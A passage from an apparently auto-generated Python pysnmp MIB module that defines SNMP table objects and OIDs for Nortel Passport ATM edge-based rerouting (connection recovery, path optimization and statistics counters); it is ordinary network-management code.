\"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmPnniMIB\", \"mscAtmIfVptPnniIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVptPnniEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVptPnniEbrProvEntry.setStatus('mandatory')\nmscAtmIfVptPnniEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue=\"c0\")).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfVptPnniEbrConnectionRecovery.setStatus('mandatory')\nmscAtmIfVptPnniEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue=\"c0\")).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfVptPnniEbrPathOptimization.setStatus('mandatory')\nmscAtmIfVptPnniEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30), )\nif mibBuilder.loadTexts: 
mscAtmIfVptPnniEbrOperTable.setStatus('mandatory')\nmscAtmIfVptPnniEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmPnniMIB\", \"mscAtmIfVptPnniIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVptPnniEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVptPnniEbrOperEntry.setStatus('mandatory')\nmscAtmIfVptPnniEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptPnniEbrSubscribedConnections.setStatus('mandatory')\nmscAtmIfVptPnniEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptPnniEbrEligibleRecoveredConnections.setStatus('mandatory')\nmscAtmIfVptPnniEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptPnniEbrIneligibleRecoveredConnections.setStatus('mandatory')\nmscAtmIfVptPnniEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 40), )\nif mibBuilder.loadTexts: mscAtmIfVptPnniEbrStatsTable.setStatus('mandatory')\nmscAtmIfVptPnniEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 40, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmPnniMIB\", \"mscAtmIfVptPnniIndex\"), (0, 
\"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVptPnniEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVptPnniEbrStatsEntry.setStatus('mandatory')\nmscAtmIfVptPnniEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 40, 1, 1), Counter32()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptPnniEbrTotalConnectionRecoveries.setStatus('mandatory')\nmscAtmIfVptPnniEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 40, 1, 2), Counter32()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptPnniEbrTotalPathOptimizations.setStatus('mandatory')\nmscAtmIfVptUniEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7))\nmscAtmIfVptUniEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1), )\nif mibBuilder.loadTexts: mscAtmIfVptUniEbrRowStatusTable.setStatus('mandatory')\nmscAtmIfVptUniEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmUniMIB\", \"mscAtmIfVptUniIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVptUniEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVptUniEbrRowStatusEntry.setStatus('mandatory')\nmscAtmIfVptUniEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1, 1, 1), RowStatus()).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfVptUniEbrRowStatus.setStatus('mandatory')\nmscAtmIfVptUniEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1, 1, 2), DisplayString()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptUniEbrComponentName.setStatus('mandatory')\nmscAtmIfVptUniEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1, 1, 4), 
StorageType()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptUniEbrStorageType.setStatus('mandatory')\nmscAtmIfVptUniEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1, 1, 10), NonReplicated())\nif mibBuilder.loadTexts: mscAtmIfVptUniEbrIndex.setStatus('mandatory')\nmscAtmIfVptUniEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 20), )\nif mibBuilder.loadTexts: mscAtmIfVptUniEbrProvTable.setStatus('mandatory')\nmscAtmIfVptUniEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 20, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmUniMIB\", \"mscAtmIfVptUniIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVptUniEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVptUniEbrProvEntry.setStatus('mandatory')\nmscAtmIfVptUniEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue=\"c0\")).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfVptUniEbrConnectionRecovery.setStatus('mandatory')\nmscAtmIfVptUniEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue=\"c0\")).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfVptUniEbrPathOptimization.setStatus('mandatory')\nmscAtmIfVptUniEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30), )\nif mibBuilder.loadTexts: mscAtmIfVptUniEbrOperTable.setStatus('mandatory')\nmscAtmIfVptUniEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, 
\"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmUniMIB\", \"mscAtmIfVptUniIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVptUniEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVptUniEbrOperEntry.setStatus('mandatory')\nmscAtmIfVptUniEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptUniEbrSubscribedConnections.setStatus('mandatory')\nmscAtmIfVptUniEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptUniEbrEligibleRecoveredConnections.setStatus('mandatory')\nmscAtmIfVptUniEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptUniEbrIneligibleRecoveredConnections.setStatus('mandatory')\nmscAtmIfVptUniEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 40), )\nif mibBuilder.loadTexts: mscAtmIfVptUniEbrStatsTable.setStatus('mandatory')\nmscAtmIfVptUniEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 40, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmUniMIB\", \"mscAtmIfVptUniIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVptUniEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVptUniEbrStatsEntry.setStatus('mandatory')\nmscAtmIfVptUniEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 40, 1, 1), 
Counter32()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptUniEbrTotalConnectionRecoveries.setStatus('mandatory')\nmscAtmIfVptUniEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 40, 1, 2), Counter32()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptUniEbrTotalPathOptimizations.setStatus('mandatory')\nmscAtmIfVptVccSrcEbrOv = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2))\nmscAtmIfVptVccSrcEbrOvRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1), )\nif mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvRowStatusTable.setStatus('mandatory')\nmscAtmIfVptVccSrcEbrOvRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptVccIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmNetworkingMIB\", \"mscAtmIfVptVccSrcIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVptVccSrcEbrOvIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvRowStatusEntry.setStatus('mandatory')\nmscAtmIfVptVccSrcEbrOvRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1, 1, 1), RowStatus()).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvRowStatus.setStatus('mandatory')\nmscAtmIfVptVccSrcEbrOvComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1, 1, 2), DisplayString()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvComponentName.setStatus('mandatory')\nmscAtmIfVptVccSrcEbrOvStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1, 1, 4), StorageType()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: 
mscAtmIfVptVccSrcEbrOvStorageType.setStatus('mandatory')\nmscAtmIfVptVccSrcEbrOvIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1, 1, 10), NonReplicated())\nif mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvIndex.setStatus('mandatory')\nmscAtmIfVptVccSrcEbrOvProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 20), )\nif mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvProvTable.setStatus('mandatory')\nmscAtmIfVptVccSrcEbrOvProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 20, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptVccIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmNetworkingMIB\", \"mscAtmIfVptVccSrcIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVptVccSrcEbrOvIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvProvEntry.setStatus('mandatory')\nmscAtmIfVptVccSrcEbrOvRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 20, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues((\"no\", 0), (\"yes\", 1))).clone('yes')).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvRecoverySubscribed.setStatus('mandatory')\nmscAtmIfVptVccSrcEbrOvOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 20, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues((\"no\", 0), (\"yes\", 1))).clone('yes')).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvOptimizationSubscribed.setStatus('mandatory')\nmscAtmIfVptVccEbrInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12))\nmscAtmIfVptVccEbrInfoRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 
20, 12, 1), )\nif mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoRowStatusTable.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 1, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptVccIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVptVccEbrInfoIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoRowStatusEntry.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 1, 1, 1), RowStatus()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoRowStatus.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 1, 1, 2), DisplayString()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoComponentName.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 1, 1, 4), StorageType()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoStorageType.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 1, 1, 10), NonReplicated())\nif mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoIndex.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 30), )\nif mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoOperTable.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 30, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", 
\"mscAtmIfVptVccIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVptVccEbrInfoIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoOperEntry.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 30, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues((\"no\", 0), (\"yes\", 1)))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoRecoverySubscribed.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 30, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues((\"no\", 0), (\"yes\", 1)))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoOptimizationSubscribed.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoConnectionRecovered = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 30, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues((\"no\", 0), (\"yes\", 1)))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoConnectionRecovered.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 40), )\nif mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoStatsTable.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 40, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptVccIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVptVccEbrInfoIndex\"))\nif mibBuilder.loadTexts: 
mscAtmIfVptVccEbrInfoStatsEntry.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 40, 1, 1), Counter32()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoTotalConnectionRecoveries.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 40, 1, 2), Counter32()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoTotalPathOptimizations.setStatus('mandatory')\nmscAtmIfPnniEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7))\nmscAtmIfPnniEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 1), )\nif mibBuilder.loadTexts: mscAtmIfPnniEbrRowStatusTable.setStatus('mandatory')\nmscAtmIfPnniEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 1, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmPnniMIB\", \"mscAtmIfPnniIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfPnniEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfPnniEbrRowStatusEntry.setStatus('mandatory')\nmscAtmIfPnniEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 1, 1, 1), RowStatus()).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfPnniEbrRowStatus.setStatus('mandatory')\nmscAtmIfPnniEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 1, 1, 2), DisplayString()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfPnniEbrComponentName.setStatus('mandatory')\nmscAtmIfPnniEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 1, 1, 4), StorageType()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfPnniEbrStorageType.setStatus('mandatory')\nmscAtmIfPnniEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 1, 1, 10), 
NonReplicated())\nif mibBuilder.loadTexts: mscAtmIfPnniEbrIndex.setStatus('mandatory')\nmscAtmIfPnniEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 20), )\nif mibBuilder.loadTexts: mscAtmIfPnniEbrProvTable.setStatus('mandatory')\nmscAtmIfPnniEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 20, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmPnniMIB\", \"mscAtmIfPnniIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfPnniEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfPnniEbrProvEntry.setStatus('mandatory')\nmscAtmIfPnniEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue=\"c0\")).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfPnniEbrConnectionRecovery.setStatus('mandatory')\nmscAtmIfPnniEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue=\"c0\")).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfPnniEbrPathOptimization.setStatus('mandatory')\nmscAtmIfPnniEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 30), )\nif mibBuilder.loadTexts: mscAtmIfPnniEbrOperTable.setStatus('mandatory')\nmscAtmIfPnniEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 30, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmPnniMIB\", \"mscAtmIfPnniIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfPnniEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfPnniEbrOperEntry.setStatus('mandatory')\nmscAtmIfPnniEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 30, 1, 1), 
Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfPnniEbrSubscribedConnections.setStatus('mandatory')\nmscAtmIfPnniEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfPnniEbrEligibleRecoveredConnections.setStatus('mandatory')\nmscAtmIfPnniEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfPnniEbrIneligibleRecoveredConnections.setStatus('mandatory')\nmscAtmIfPnniEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 40), )\nif mibBuilder.loadTexts: mscAtmIfPnniEbrStatsTable.setStatus('mandatory')\nmscAtmIfPnniEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 40, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmPnniMIB\", \"mscAtmIfPnniIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfPnniEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfPnniEbrStatsEntry.setStatus('mandatory')\nmscAtmIfPnniEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 40, 1, 1), Counter32()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfPnniEbrTotalConnectionRecoveries.setStatus('mandatory')\nmscAtmIfPnniEbrTotalPathOptimizations = MibTableColumn((1, 3, 